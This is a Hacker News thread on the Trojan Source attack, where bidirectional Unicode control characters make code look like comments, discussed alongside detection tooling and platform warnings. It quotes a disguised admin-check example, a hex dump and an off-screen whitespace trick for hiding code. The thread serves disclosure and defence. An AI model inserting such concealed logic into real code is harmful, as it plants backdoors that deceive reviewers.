Something puzzles me: this kind of tricks would definitely break syntax highlighting, wouldn't it?

jwilk | karma 8094 | avg karma 2.47 2021-11-01 04:11:33 | [–] similar comments

Another HN discussion:

https://news.ycombinator.com/item?id=29061987

ChrisMarshallNY | karma 26729 | avg karma 3.63 2021-11-01 04:13:56 | [–] similar comments

Looks like avoiding dependencies and snippets is a good way to mitigate this.

In my own work, I use almost no dependencies (aside from compilers and built-in APIs). Scratch that. I use a lot of dependencies, but ones that I have written, and generally rewrite snippets, when I use them.

Also, very little of the code I see, has comments.

Like, any comments; even headerdoc comments.

> Green said the good news is that the researchers conducted a widespread vulnerability scan, but were unable to find evidence that anyone was exploiting this. Yet.

… “yet” …

I know that I’m a “dependency curmudgeon,” but stuff like this just serves to reinforce my posture.

Cthulhu_ | karma 26640 | avg karma 2.23 2021-11-01 04:22:47 | [–] similar comments

But what if this is slipped into your compiler? Your operating system's kernel? A top voted Stack Overflow answer? You can't (or it's infeasible to) check and control everything.

_3u10 | karma 12688 | avg karma 16.63 2021-11-01 04:24:55 | [–] similar comments

Yes, you're totally safe then. I've never heard of standard libraries having problems that affect security, certainly not the str* family of functions.

ChrisMarshallNY | karma 26729 | avg karma 3.63 2021-11-01 08:30:52 | [–] similar comments

Any particular reason for the nasty? I thought we didn't do that kind of thing, around these parts, but I'm often wrong.

_3u10 | karma 12688 | avg karma 16.63 2021-11-01 15:21:44 | [–] similar comments

The pain of having worked under these conditions of not using libraries, usually having to work with subpar libraries that were developed internally.

Like oh, hey, we need a database, great, let's roll our own. Or the ancient version of whatever lib shipped with the OS that is full of bugs solved in subsequent versions.

I see that you now use a lot of dependencies, and retract my statement.

ChrisMarshallNY | karma 26729 | avg karma 3.63 2021-11-01 20:54:04 | [–] similar comments

Feel free to check out my work. You’ll see the quality bar I set for myself. Almost all of the repos are code that I incorporate into my projects. I just. Plain. Don’t. Trust. most code out there.

I can see the kitchen from the lunch counter, and I’m a damn good cook, myself.

I won’t tell anyone else what to do (unless I’m paying them), but I refuse to add code to my projects that I don’t trust completely (which is, I know, not a guarantee, but it’s a pretty good bet).

I have to rely on the core libraries and development tools I use, but, if I have my druthers, I am picky as hell.

Seriously. Look at my stuff. You’ll see that I put my work where my mouth is.

ChrisMarshallNY | karma 26729 | avg karma 3.63 2021-11-01 05:18:45 | [–] similar comments

sigh...Why does it have to be "all or nothing"? These logical fallacies are pretty much a standard in these discussions.

Either have 100%, ironclad security, or "Who cares? YOLO! STDs be damned" abandon?

We do what we can to make sure what we write is as good as possible.

I lock my car door, when I get out. I know that it won't stop a determined thief, but it will avoid problems from the casual knucklehead.

z29LiTp5qUC30n | karma 275 | avg karma 4.23 2021-11-01 04:16:36 | [–] similar comments

The bootstrappable community already produced a solution for this: https://github.com/oriansj/stage0/blob/master/High_level_pro...

im3w1l | karma 8737 | avg karma 1.51 2021-11-01 04:39:27 | [–] similar comments

I remember bringing this up many years ago. Yes specifically making code seem like comments using bidi. I'm just a little bit salty I won't get the credit.

https://bugs.eclipse.org/bugs/show_bug.cgi?id=339146

fullstackchris | karma 633 | avg karma 1.59 2021-11-01 04:58:15 | [–] similar comments

I fail to see how this can actually be used as an exploit. As some commenters have said, yes, it may be a risk to some open source tools where there is poor due diligence in the merge request review process - but that is almost never the case.

Otherwise, if you own your own code, this obviously isn't an issue. (Unless, of course, for some reason you want to program exploits into software at your organization :) )

Heck, even GitHub already shows a warning for files that have bi-directional unicode...

A bit of an overemotional title if you ask me.

pietroalbini | karma 2649 | avg karma 25.72 2021-11-01 05:04:51 | [–] similar comments

It's this research that prompted GitHub to show warnings, they didn't appear as of yesterday.

willvarfar | karma 17791 | avg karma 5.17 2021-11-01 05:27:58 | [–] similar comments

https://blog.rust-lang.org/2021/11/01/cve-2021-42574.html has a nice clear example.

Full Stack Chris reviews some code that he thinks says:

    if access_level != "user" { // Check if admin

This may be an open source project. This may be an internal bad egg (a very common threat; insider jobs are actually one of the absolute top risks to a company). Or this code may be injected by an attacker who has gained access to the repo and is leaving backdoors that they hope to survive long after their access is blocked or leaving backdoors to make deployed production systems vulnerable. Etc.

And Chris won't notice that the computer will execute:

    if access_level != "user{U+202E} {U+2066}// Check if admin{U+2069} {U+2066}" {

This is not just an attack on compiled languages. Scripting languages are just as vulnerable.
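
A reviewer's tooling can look for these characters directly. A minimal Python sketch, assuming the set to flag is the nine explicit directional formatting characters (embeddings, overrides, isolates and their terminators); `find_bidi_controls` is a made-up name:

```python
import unicodedata

# Explicit directional formatting characters: LRE, RLE, PDF, LRO, RLO,
# LRI, RLI, FSI, PDI.
BIDI_CONTROLS = frozenset(
    "\u202a\u202b\u202c\u202d\u202e\u2066\u2067\u2068\u2069"
)

def find_bidi_controls(source):
    """Yield (line_number, column, character name) for each bidi control found."""
    for line_number, line in enumerate(source.splitlines(), start=1):
        for column, ch in enumerate(line, start=1):
            if ch in BIDI_CONTROLS:
                yield line_number, column, unicodedata.name(ch)

# The line the computer actually sees, with the controls written as escapes.
line = 'if access_level != "user\u202e \u2066// Check if admin\u2069 \u2066" {'
for hit in find_bidi_controls(line):
    print(hit)
```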

kiklion | karma 192 | avg karma 3.25 2021-11-01 06:48:37 | [–] similar comments

Sorry, still don’t get it.

Isn’t the issue that they are using magic strings? If the strings were something like RoleConstants.Admin then this is avoided?

Though I don’t understand the point of the Unicode characters in the comment string so I must be missing something.

tzs | karma 45790 | avg karma 3.13 2021-11-01 09:17:43 | [–] similar comments

> Though I don’t understand the point of the Unicode characters in the comment string so I must be missing something.

There is no comment string.

kiklion | karma 192 | avg karma 3.25 2021-11-01 10:17:22 | [–] similar comments

So after reading other parts, I get where I was mistaken but still believe proper coding practices of avoiding magic strings would avoid many of the potential issues.

My mistake was thinking the initial Unicode character was changing the comparison string the way a non-printable character could. Instead it flips the display ordering, so that what looks like a comment is actually part of the comparison string, and the string is only terminated after it.
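
One way to convince yourself of this is to ask a tokenizer what it sees. A small sketch using Python's standard `tokenize` module on a Python analogue of the line (an assumption for illustration: `#` stands in for `//`):

```python
import io
import tokenize

# Python analogue of the example line. The bidi controls are written as
# escapes here; the resulting string contains the real characters.
source = (
    'if access_level != "user\u202e \u2066# Check if admin\u2069 \u2066":\n'
    '    pass\n'
)

tokens = list(tokenize.generate_tokens(io.StringIO(source).readline))
strings = [tok.string for tok in tokens if tok.type == tokenize.STRING]
comments = [tok.string for tok in tokens if tok.type == tokenize.COMMENT]

# One string token, no comment tokens: the "comment" lives inside the literal.
print(len(strings), len(comments))
print(ascii(strings[0]))
```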

db48x | karma 6953 | avg karma 2.05 2021-11-03 14:18:37 | [–] similar comments

Don’t get hung up on strings, you can execute this attack with just comments. Look at the other examples in the paper.

The idea here is that you make part of the comment appear to be outside of it, and thus appear to be code that will be executed. You can reshuffle the text arbitrarily, so you can move text backwards to appear to be before the start of the comment, or forwards to appear to be after the end of the comment. If you really want to, you can treat the whole line as an anagram, and rearrange the individual letters into any order you like. This could enable really clever attacks where any use of an enum constant appears to be a use of a different one.

sethammons | karma 7497 | avg karma 2.33 2021-11-01 08:28:37 | [–] similar comments

And the dev wrote test cases (negative ones too!). The test fails and shows admin privileges for the normal user. Debugging ensues. I'd hope.

wizzwizz4 | karma 5694 | avg karma 1.61 2021-11-01 08:38:13 | [–] similar comments

The test has the same kind of change. It passes, and nobody thinks to look at the obviously-correct code.

robotmay | karma 2959 | avg karma 3.66 2021-11-01 05:21:51 | [–] similar comments

This was a pretty interesting thing to mitigate - we added some support around it to GitLab after it was reported to us, which shipped in the latest security release: https://gitlab.com/gitlab-org/gitlab/-/commit/3fb44197195b57... (you can actually see it in effect on that commit's examples, which is quite meta). These characters have valid use-cases in right-to-left languages like Arabic, Japanese etc, so it had to be configurable for project-owners if they have legitimate use-cases for it. Our focus was on making sure that repository maintainers could see these characters in code reviews.

The homoglyph attack is interesting but it really should be noticed as part of a code review process, as it requires adding the imitation function calls at some point too. It'd also likely be pretty frustrating to end users if we were to highlight every single unicode character that looks like the latin alphabet.

It's certainly a good lesson in not copy/pasting random snippets from the internet and pasting them into a root shell, however :D (we do always highlight the bidi characters on GitLab snippets, though)

Aside: this was a royal pain in the arse to figure out if I had live examples in the specs, because vim also just rendered them "correctly". I ended up checking the files in Windows Notepad on another machine to sanity check them.

Thanks to the authors for responsible disclosure.

jhgb | karma 3259 | avg karma 1.37 2021-11-01 08:08:04 | [–] similar comments

> It'd also likely be pretty frustrating to end users if we were to highlight every single unicode character that looks like the latin alphabet.

That actually strikes me as very desirable. (Especially in light of the old maxim that "programs must be written for people to read, and only incidentally for machines to execute".)

wizzwizz4 | karma 5694 | avg karma 1.61 2021-11-01 08:10:41 | [–] similar comments

Those Unicode characters aren't just there for show. They're part of real scripts that real people use; it would be annoying for people using those scripts.

jhgb | karma 3259 | avg karma 1.37 2021-11-01 08:14:05 | [–] similar comments

I'm fairly sure this could be arranged for. As in, if there's too many of them belonging to the character set of a particular language, then it's very likely that it's simply a text in that language. But random characters in the middle of ASCII identifiers are probably not something that you want.

robotmay | karma 2959 | avg karma 3.66 2021-11-01 08:24:10 | [–] similar comments

Yeah I'm not opposed to adding highlighting to them, and we are investigating how to do it, but it was less clear-cut than the bidi characters (which are totally invisible when rendered). I think we'll want to make it a bit more configurable and probably a separate option to the one which highlights the bidi characters.

pas | karma 7438 | avg karma 1.12 2021-11-01 13:23:35 | [–] similar comments

Yes, and they should be in well annotated/marked string/data sections, not in logic code.

R0b0t1 | karma 2066 | avg karma 1.31 2021-11-01 13:54:18 | [–] similar comments

This type of attack isn't new. I can't recall the names but there are afair multiple C/C++ coding standards that limit everything to ASCII to avoid precisely this attack, but also others with visually similar but nonequivalent names.

JoshTriplett | karma 44606 | avg karma 4.76 2021-11-01 16:51:07 | [–] similar comments

Exactly. When we were adding support for non-ASCII identifiers to Rust, and thinking about homoglyphs and confusable characters, we needed to evaluate the tradeoffs between catching such characters and inconveniencing the speakers of various languages who want to write Rust in their language.

grishka | karma 11238 | avg karma 3.26 2021-11-01 13:52:12 | [–] similar comments

Latin C and Cyrillic С aren't the same letter. The latter is actually an "s". It would be a pain in the ass to work with strings if those Cyrillic letters that look like their Latin counterparts reused their codepoints. Imagine having to convert "M" to lowercase. Would that return "m" or "м"? Same for "H", "h" or "н"?
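
The case-mapping point is easy to check. A short Python sketch (the variable names are just for illustration) showing that the look-alike capitals have different lowercase forms because they are separate codepoints:

```python
import unicodedata

latin_m, cyrillic_em = "M", "\u041c"  # look identical in most fonts
latin_h, cyrillic_en = "H", "\u041d"

for ch in (latin_m, cyrillic_em, latin_h, cyrillic_en):
    lower = ch.lower()
    print(
        f"U+{ord(ch):04X} {unicodedata.name(ch)} -> "
        f"U+{ord(lower):04X} {unicodedata.name(lower)}"
    )
```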

And, actually, there was some really really cursed Soviet encoding that did this to save bits. The Russian railway company still uses it[1] to this day.

[1] https://habr.com/ru/post/547820/

gambas99 | karma 9 | avg karma 3.0 2021-11-01 14:26:44 | [–] similar comments

> there was some really really cursed Soviet encoding

I know at least 10 stories that start like this

jhgb | karma 3259 | avg karma 1.37 2021-11-01 15:42:21 | [–] similar comments

> Latin C and Cyrillic С aren't the same letter.

Well, as a moderately old Czech, I'm somewhat familiar with Cyrillic. They kind of used to force it on us in schools.

acdha | karma 35410 | avg karma 2.73 2021-11-01 08:31:24 | [–] similar comments

> It'd also likely be pretty frustrating to end users if we were to highlight every single unicode character that looks like the latin alphabet.

Have you tried something similar to what the browsers do where highlighting is only enabled when there are multiple scripts mixed within the same token? Source code seems like it would be harder since you have many tokens rather than just a single one as in a hostname, and I'd be curious how much legitimate usage mixes scripts for technical reasons because you have something like a language or framework convention that certain names start with a particular English-derived term.
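
A rough sketch of that per-token idea in Python. Big caveat: the standard library does not expose the Unicode Script property, so this approximates a letter's script by the first word of its character name, which is an assumption that will misfire in places (for example, Japanese text legitimately mixing kana and kanji):

```python
import re
import unicodedata

def scripts_in(token):
    """Approximate each letter's script by the first word of its Unicode name."""
    return {
        unicodedata.name(ch, "UNKNOWN").split()[0]
        for ch in token
        if ch.isalpha()
    }

def mixed_script_tokens(source):
    """Return identifier-like tokens whose letters come from more than one script."""
    tokens = re.findall(r"\w+", source)
    return [tok for tok in tokens if len(scripts_in(tok)) > 1]
```

With this, an all-Cyrillic identifier passes untouched, while `us\u0435r_role` (Latin with one Cyrillic letter) gets flagged.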

robotmay | karma 2959 | avg karma 3.66 2021-11-01 09:17:30 | [–] similar comments

So far we're just detecting individual bidi characters, but looking at characters in their greater context could be quite interesting. This would seem like quite a good use-case for machine-learning too, if you wanted to get super into it.

specialist | karma 10439 | avg karma 1.48 2021-11-01 08:43:17 | [–] similar comments

> It's certainly a good lesson in not copy/pasting random snippets from the internet...

For someone with more gumption than me:

Future copy & paste will, by default, have intermediate screenshot and OCR steps. Voila: charset scrubbing for free.

Why not? Already today misc UIs and renderings disallow text selection. Drives me nuts.

modeless | karma 36822 | avg karma 6.69 2021-11-01 12:50:41 | [–] similar comments

The future is now. Android has been doing this for years and it's awesome. There's no text you can't copy.

To clarify, by default copy and paste works the normal way, but you can open the app switcher to use the OCR copy/paste which works on non-selectable text too, even in images.

QuercusMax | karma 2479 | avg karma 2.61 2021-11-01 14:48:01 | [–] similar comments

There's a way to prevent this - to my great annoyance, health apps (such as the ubiquitous MyHealth variants) and banking apps can prevent you from taking screenshots or copying text. This is presumably to prevent screen-scraping apps from stealing your private data, but it's really annoying when you're trying to screenshot a QR code for some kind of check-in process.

checkyoursudo | karma 2181 | avg karma 2.39 2021-11-01 16:06:40 | [–] similar comments

That's why you need a second phone to photograph the screen of the first phone.

josephcsible | karma 22500 | avg karma 3.06 2021-11-02 01:13:12 | [–] similar comments

If you root your phone, you can use an Xposed module like DisableFlagSecure to get around apps that do that.

kevin_thibedeau | karma 19088 | avg karma 2.16 2021-11-01 14:46:31 | [–] similar comments

This is too complicated for a personal supercomputer to be burdened with. Better to ship everything on the clipboard to a sanitizer service.

stackbutterflow | karma 994 | avg karma 3.68 2021-11-01 08:59:34 | [–] similar comments

> It's certainly a good lesson in not copy/pasting random snippets from the internet and pasting them into a root shell, however

I gotta say that I always make sure that I understand each piece of code that I copy paste but I do copy paste and never thought of this type of attack. Maybe that's something I should pay attention to in the future.

captaincrunch | karma 871 | avg karma 2.39 2021-11-01 09:18:38 | [–] similar comments

From the article, it's likely you'd not even notice - unless you pasted into an ASCII-only editor that doesn't allow anything other than plain old text.

charcircuit | karma 2002 | avg karma 0.38 2021-11-01 09:07:54 | [–] similar comments

>These characters have valid use-cases in right-to-left languages like Arabic, Japanese etc,

I've never seen it used for Japanese. I don't think there is a valid use case for Japanese.

robotmay | karma 2959 | avg karma 3.66 2021-11-01 09:12:07 | [–] similar comments

Ah yes you're right - looks like that can be handled with CSS: https://www.w3.org/International/articles/vertical-text/. Although from what I've seen most Japanese websites tend to be left-to-right instead anyway.

Hebrew would be a more valid second example I think. I'd be curious to know how many languages maintain their RTL preference online.

dhosek | karma 7666 | avg karma 2.62 2021-11-01 14:18:00 | [–] similar comments

Japanese¹ isn't a right to left language, exactly. It can be written horizontally, in which case it's L-R, top to bottom, or, vertically, in which case it's top to bottom, with columns running R-L, but functionally, this is still like L-R typesetting, just with the characters rotated 90° CCW and the pages are then read in the same order as pages in a R-L book. This is typical of manga which is why there might have been confusion by the OP about the directionality of Japanese.

1. All of this also applies to Chinese and Korean. Interestingly, traditional Mongolian script is also written vertically, but in columns left to right rather than right to left.

capitainenemo | karma 1398 | avg karma 2.4 2021-11-01 09:08:11 | [–] similar comments

This doesn't feel particularly new either? Isn't it pretty much a new variant of https://github.com/reinderien/mimic ?

Which, if one is suspicious of code, can be defeated in vim with: set encoding=latin1

Piskvorrr | karma 5073 | avg karma 1.42 2021-11-02 09:29:11 | [–] similar comments

Which breaks other things, such as every other string that's not written in English. But it's a great tip for a quick check, thanks! (Much more convenient than piping text through xxd)

capitainenemo | karma 1398 | avg karma 2.4 2021-11-02 11:48:49 | [–] similar comments

Yeah, it's definitely just for quick checks if the text is in fact using unicode. But, hopefully just for stuff you're suspicious of where you could mandate no-unicode.

slim | karma 3135 | avg karma 1.95 2021-11-01 09:22:28 | [–] similar comments

> this was a royal pain in the arse to figure out if I had live examples in the specs, because vim also just rendered them "correctly"

That's because vim supports Farsi/Arabic natively from day one. Even if the OS does not support it, you can still write bidirectional and right-to-left text in vim. Never knew the reason, but thanks Bram Moolenaar.

smashed | karma 1035 | avg karma 4.5 2021-11-01 09:41:53 | [–] similar comments

I was intrigued by your meta example and I took a look. It took me 3-4 minutes to find the warning, and I was looking for it!

I was expecting a big fat warning on the merge request itself, or maybe on the lines containing the dangerous chars.

In the end, it is a small ? character inserted where the unicode control chars are, and a mouseover tooltip warning about a potential issue.

The warning is good, but why so subtle? Sorry for the criticism. The feature is still a huge positive.

robotmay | karma 2959 | avg karma 3.66 2021-11-01 09:54:24 | [–] similar comments

Thanks for the feedback! Our primary use-case when deciding on it was to flag these up in a code-review situation, to prevent malicious content being submitted in merge requests to unsuspecting projects. We found this made it stand out enough to the reviewer when performing code reviews. I also try to not be too quick to add new alerts or sections to the GUI as we sometimes get criticised for having too much clutter D:

GitHub by comparison went down the alert banner route, from what I can see. I'm not opposed to adding something to that effect as well though - especially for inexperienced reviewers, it would be nice to include some more information about the potential exploit. That could be something we revisit when we add the homoglyph highlighting.

stolsvik | karma 400 | avg karma 1.47 2021-11-02 01:59:54 | [–] similar comments

Thus, one sloppy review by that known tired-in-the-mornings dev, "sure thing, looks like Java..", and your little marking is missed?

lelandbatey | karma 3369 | avg karma 3.06 2021-11-01 12:25:58 | [–] similar comments

I was impatient to find the example you were talking about; as far as I can tell, this is the line with the example: https://gitlab.com/gitlab-org/gitlab/-/commit/3fb44197195b57...

And here's what it looks like in various conditions/viewers:

With the fix, this is how it looks in the browser in the Gitlab interface:

    if (accessLevel != "user?") {? // Check if admin ??

Without the fix, viewed raw (and thus viewed in a vulnerable way), it looks like this:

    if (accessLevel != "user") { // Check if admin

And in a hex viewer, it looks like this:

    000005b0: 2020 2020 2020 2069 6620 2861 6363 6573         if (acces
    000005c0: 734c 6576 656c 2021 3d20 2275 7365 72e2  sLevel != "user.
    000005d0: 80ae 20e2 81a6 2f2f 2043 6865 636b 2069  .. ...// Check i
    000005e0: 6620 6164 6d69 6ee2 81a9 20e2 81a6 2229  f admin... ...")
    000005f0: 207b 0a20 2020 2020 2020 2020 2020 2020   {.
    00000600: 2063 6f6e 736f 6c65 2e6c 6f67 2822 596f   console.log("Yo
    00000610: 7520 6172 6520 616e 2061 646d 696e 2e22  u are an admin."
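
For anyone who doesn't read UTF-8 in hex: a small Python sketch that decodes the bytes from the dump above (from the "r" of "user" through the closing quote) and names the non-ASCII characters:

```python
import unicodedata

# Bytes copied from the hex dump: 'r', then the hidden controls and the
# fake comment, up to and including the closing double quote.
raw = bytes.fromhex(
    "72 e2 80 ae 20 e2 81 a6 2f 2f 20 43 68 65 63 6b 20"
    "69 66 20 61 64 6d 69 6e e2 81 a9 20 e2 81 a6 22"
)

text = raw.decode("utf-8")
for ch in text:
    if ord(ch) > 127:
        print(f"U+{ord(ch):04X} {unicodedata.name(ch)}")
```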

Antwnis | karma 82 | avg karma 5.47 2021-11-01 13:06:21 | [–] similar comments

That's a great example ^ that demonstrates exactly how this vulnerability can be easily abused

josephcsible | karma 22500 | avg karma 3.06 2021-11-02 01:16:45 | [–] similar comments

I personally wish that in repos with the warning enabled, that the ?s were displayed in lieu of the malicious characters instead of in addition to them. For example, I'd rather see this:

          var accessLevel = "user";
          if (accessLevel != "user? ?// Check if admin? ?") {
              console.log("You are an admin.");
          }

than this:

          var accessLevel = "user";
          if (accessLevel != "user?") {? // Check if admin?? 
              console.log("You are an admin.");
          }
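
Outside the browser, the "in lieu of" rendering is simple to get. A minimal Python sketch, not GitLab's code; `reveal_bidi` and the `<U+XXXX>` tag format are made up for illustration:

```python
import re

# The nine explicit bidi formatting characters (U+202A..U+202E, U+2066..U+2069).
BIDI_PATTERN = re.compile("[\u202a-\u202e\u2066-\u2069]")

def reveal_bidi(text):
    """Replace each bidi control with a visible <U+XXXX> tag."""
    return BIDI_PATTERN.sub(lambda m: f"<U+{ord(m.group()):04X}>", text)

line = 'if (accessLevel != "user\u202e \u2066// Check if admin\u2069 \u2066") {'
print(reveal_bidi(line))
```

Because the controls are removed rather than kept, the text is shown in its logical order and nothing gets reordered on display.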

robotmay | karma 2959 | avg karma 3.66 2021-11-02 06:47:10 | [–] similar comments

Is that possible to do using CSS with our existing markup? Currently we prepend the ? using ::before. I imagine we could probably hide the existing character and shuffle the ? over where it should be, but it might need some testing across different text sizes I imagine. I'll make a note of it for our next revision :)

josephcsible | karma 22500 | avg karma 3.06 2021-11-03 00:08:42 | [–] similar comments

I don't think what I want is possible with a pure-CSS solution, but I'm not 100% sure.

qwerty456127 | karma 8748 | avg karma 1.93 2021-11-01 05:36:00 | [–] similar comments

Although I'm not a native English speaker, and I meant almost all the programs I ever wrote to be capable of processing any given language (and in some cases to have localized UIs), I see no reason for non-English strings to be allowed in source code and code files, except in some ad-hoc scripts where hard-coding some text can be an optimal solution.

We probably just need a git switch which would make it throw an error if it encounters Bidi or any weirdness like that except in resource files.
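
I'm not aware of a built-in Git switch for this, but a hook script gets close. A hedged Python sketch: the function names and the `exempt_suffixes` default (standing in for "resource files") are assumptions, and wiring it into a pre-commit hook is left out:

```python
import sys

BIDI_CONTROLS = frozenset(
    "\u202a\u202b\u202c\u202d\u202e\u2066\u2067\u2068\u2069"
)

def files_with_bidi(paths, exempt_suffixes=(".po",)):
    """Return the paths (minus exempt ones) whose text contains a bidi control."""
    flagged = []
    for path in paths:
        if path.endswith(tuple(exempt_suffixes)):
            continue  # hypothetical exemption for resource files
        with open(path, encoding="utf-8", errors="replace") as handle:
            text = handle.read()
        if any(ch in BIDI_CONTROLS for ch in text):
            flagged.append(path)
    return flagged

def main(argv):
    """Report offending files on stderr; return 1 if any were found, else 0."""
    bad = files_with_bidi(argv)
    for path in bad:
        print(f"bidi control character found in {path}", file=sys.stderr)
    return 1 if bad else 0
```

In a hook you would end the script with `sys.exit(main(sys.argv[1:]))` and pass it the staged file names.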

samus | karma 1894 | avg karma 1.18 2021-11-01 05:48:58 | [–] similar comments

Since most programming languages are based on English, non-English text in string literals is almost always user-facing and should be put in resource files to make translation into additional languages easier.

Identifiers and comments are a serious problem though. Many application domains use terms that are tricky to translate into english. The translations could be misleading, inappropriate or not unique. Sometimes they are just plain wrong or there is no english word that fits. All of these could cause misconceptions, confusion and bugs, and make reading and working with the code and the running system harder.

josephcsible | karma 22500 | avg karma 3.06 2021-11-01 09:04:43 | [–] similar comments

> Many application domains use terms that are tricky to translate into english.

What if instead of translating those terms to English, you just transliterated them to the Latin alphabet?

samus | karma 1894 | avg karma 1.18 2021-11-02 10:26:04 | [–] similar comments

That works perfectly fine for German. For languages with latin-style alphabets it depends on how used people are to work with unaccented text. For some languages (for example Vietnamese[0]), the ASCII fallback modes are quite clumsy. Languages with non-latin alphabets might completely lack a standardized, widely used romanization system that works in ASCII.

For Chinese and Japanese, using a romanization is not really an option. Most romanization systems are intended for academic study, as pronunciation aids and for input methods. Most varieties of Chinese have a huge number of homophones, and the romanization of such texts can be difficult to read unambiguously.

[0]: https://en.m.wikipedia.org/wiki/Vietnamese_Quoted-Readable

qwerty456127 | karma 8748 | avg karma 1.93 2021-11-01 09:13:18 | [–] similar comments

So you mean you can write a program and be unable to explain what it does in plain English?

samus | karma 1894 | avg karma 1.18 2021-11-02 01:19:40 | [–] similar comments

The basic operation can be explained in English, but comments for that are potentially not as important as the implications for the application domain.

mkl | karma 11432 | avg karma 2.64 2021-11-01 06:13:48 | [–] similar comments

Non-English characters are quite useful in comments where you're explaining Unicode processing stuff, and in regexes working with the characters, and when you're using maths notation (proper symbols in comments, Greek letters for variables, etc.), and when you're drawing boxes in a terminal. I'm sure there are many more too.

qwerty456127 | karma 8748 | avg karma 1.93 2021-11-01 07:41:52 | [–] similar comments

I omitted this to keep it simple (this is why I wrote non-English rather than non-ASCII, I actually am a proponent of active usage of proper Unicode symbols like ?, ?, etc, and also TUIs) but yes, I would prefer a rather extended English char-set including Greek letters, mathematical symbols, pseudographics etc. These can be useful and are not much trickier than English letters. But I would certainly like to see at least a warning (I would even prefer an Error actually) if my code file includes anything related to RTL, complex character composition or non-Latin letters other than Greek.

samus | karma 1894 | avg karma 1.18 2021-11-01 05:38:59 | [–] similar comments

It may be worth taking a step back and having a fresh look at the underlying problem.

Source code combines multiple kinds of text. There are

* hierarchical structure,

* mathematical and logical syntax

* literals (especially insidious: text)

* free text in comments and

* markup in documentation

These newly discovered vulnerabilities remind me of the issue of SQL injection, which is also caused by a confusion when combining these kinds of text.

For SQL injection, the solution was to introduce facilities to explicitly combine SQL syntax and dynamic literals. Maybe we need something similar for code that enforces such strict separation. Maybe into different files or nested into a container format. There are already facilities for doing so (resource files, templating languages) but they are opt-in and don't go far enough to address the newly discovered problems.
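
For readers who haven't seen the SQL side of the analogy, a minimal sketch with Python's built-in `sqlite3` module; the table and the hostile input are invented for illustration:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'admin'), ('bob', 'user')")

hostile = "nobody' OR '1'='1"

# Unsafe: the literal is spliced into the SQL text, so its quote characters
# are parsed as syntax and the WHERE clause matches every row.
unsafe_rows = conn.execute(
    f"SELECT name FROM users WHERE name = '{hostile}'"
).fetchall()

# Safe: the "?" placeholder keeps the value out of the SQL text entirely,
# so it is only ever compared as data.
safe_rows = conn.execute(
    "SELECT name FROM users WHERE name = ?", (hostile,)
).fetchall()

print(len(unsafe_rows), len(safe_rows))
```

The placeholder is the "explicit facility" here: syntax and literal travel on separate channels and cannot be confused with each other.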

The cost would be that code could become more difficult to edit with plain-text editors.

metroholografix | karma 830 | avg karma 4.3 2021-11-01 05:39:51 | [–] similar comments

Emacs "fix": (setq bidi-display-reordering nil) in relevant modes.

perihelions | karma 28273 | avg karma 8.36 2021-11-01 05:45:30 | [–] similar comments

I forced it globally, are there reasons that's bad to do?

    (setf (default-value 'bidi-display-reordering) nil)

The BIDI issue looks pretty bad in emacs-gtk: the sneaky text is unnoticeable in lots of modes, unless the cursor just happens to scroll over it.

josephcsible | karma 22500 | avg karma 3.06 2021-11-01 09:06:54 | [–] similar comments

Why did you put "fix" in quotes? Isn't that an actual fix for this?

cestith | karma 2277 | avg karma 1.73 2021-11-01 10:01:08 | [–] similar comments

It's more of a workaround that breaks things for people legitimately using RTL strings isn't it?

db48x | karma 6953 | avg karma 2.05 2021-11-03 14:20:42 | [–] similar comments

Yes. I recommend using whitespace-mode to cause these characters to be displayed visually, while still functioning correctly.

dathinab | karma 9826 | avg karma 2.78 2021-11-01 06:05:59 | [–] similar comments

I would say it's less that they discovered a new vulnerability and more that they put needed focus on a long-known problem.

It's just that many people while knowing the problem never considered that it could be used in supply chain attacks.

dwheeler | karma 6180 | avg karma 5.63 2021-11-01 06:09:59 | [–] similar comments

As I previously noted on a related post:

Interesting paper. Note, however, that the general problem is already known and there are a number of pre-existing works that discuss it. This is typically called "underhanded code" or sometimes "maliciously misleading code". I'm surprised that they didn't use the normal term for the problem nor cite the previous work on it - maybe they didn't realize this was a widely-known problem? Previous works on underhanded code didn't discuss Bidi to my knowledge (though other attacks on text like this have exploited Bidi). Here are a number of other materials about underhanded code:

The Obfuscated V Contest (http://graphics.stanford.edu/~danielh/vote/vote.html) was created by Daniel Horn in 2004 and is the earliest “underhanded” programming contest that I found. It was a contest to create source code that looked like it did one thing, but actually did another.

Underhanded C Contest (http://www.underhanded-c.org/) has run in many years. Per its FAQ, "The Underhanded C Contest is an annual contest to write innocent-looking C code implementing malicious behavior."

My PhD dissertation "Fully Countering Trusting Trust through Diverse Double-Compiling" discusses how to counter the "trusting trust" problem & includes a section about maliciously misleading source code. See: https://dwheeler.com/trusting-trust/

The JavaScript Misdirection Contest announced the winner on September 27, 2015 http://misdirect.ion.land/

My paper "Initial Analysis of Underhanded Source Code", (by David A. Wheeler, April, 2020, IDA document: D-13166), discusses underhanded code and the effectiveness of several potential countermeasures. It also includes a number of citations to other works on underhanded code. https://www.ida.org/research-and-publications/publications/a...

kfichter | karma 457 | avg karma 6.35 2021-11-01 06:56:49 | [–] similar comments

First place winner of last year's underhanded Solidity contest used exactly this trick: https://blog.soliditylang.org/2020/12/03/solidity-underhande...

axic | karma 4 | avg karma 4.0 2021-11-01 09:09:43 | [–] similar comments

There was a related issue in 2018 regarding line endings, which would allow some lines to be disguised as code while actually remaining comments: https://docs.google.com/document/d/1PZBSCBWBwd6AqWCgXqLnw8FN...

Both of these were fixed in Solidity shortly after the bug reports.

(P.S. I'm a member of the Solidity team)

kfichter | karma 457 | avg karma 6.35 2021-11-01 22:03:03 | [–] similar comments

This is a great treasure trove of deep Solidity trivia. Thanks for the link!

taviso | karma 3044 | avg karma 16.37 2021-11-01 12:45:42 | [–] similar comments

It's also worth noting that if you're caught playing games like this, there is really no way to explain your actions that would avoid serious consequences.

If however, you used the "bugdoor" method, you can plausibly deny any malicious intent and you will absolutely get away with it.

Too | karma 4126 | avg karma 1.55 2021-11-02 00:34:13 | [–] similar comments

Oldest trick in the book:

    /* Legitimate comment.        <a lot of white space to go off screen> */ #define malicious code

Nobody will notice the horizontal scroll bar.

Piskvorrr | karma 5073 | avg karma 1.42 2021-11-02 09:31:20 | [–] similar comments

Except your IDE and CI should rightfully complain about lines of 160+ characters. That's one of the real reasons for this rule, not just "fits on the screen nicely".

dwheeler | karma 6180 | avg karma 5.63 2021-11-03 18:56:04 | [–] similar comments

That often fails. E.g., Vim has line wrap on by default so you would still see the text.

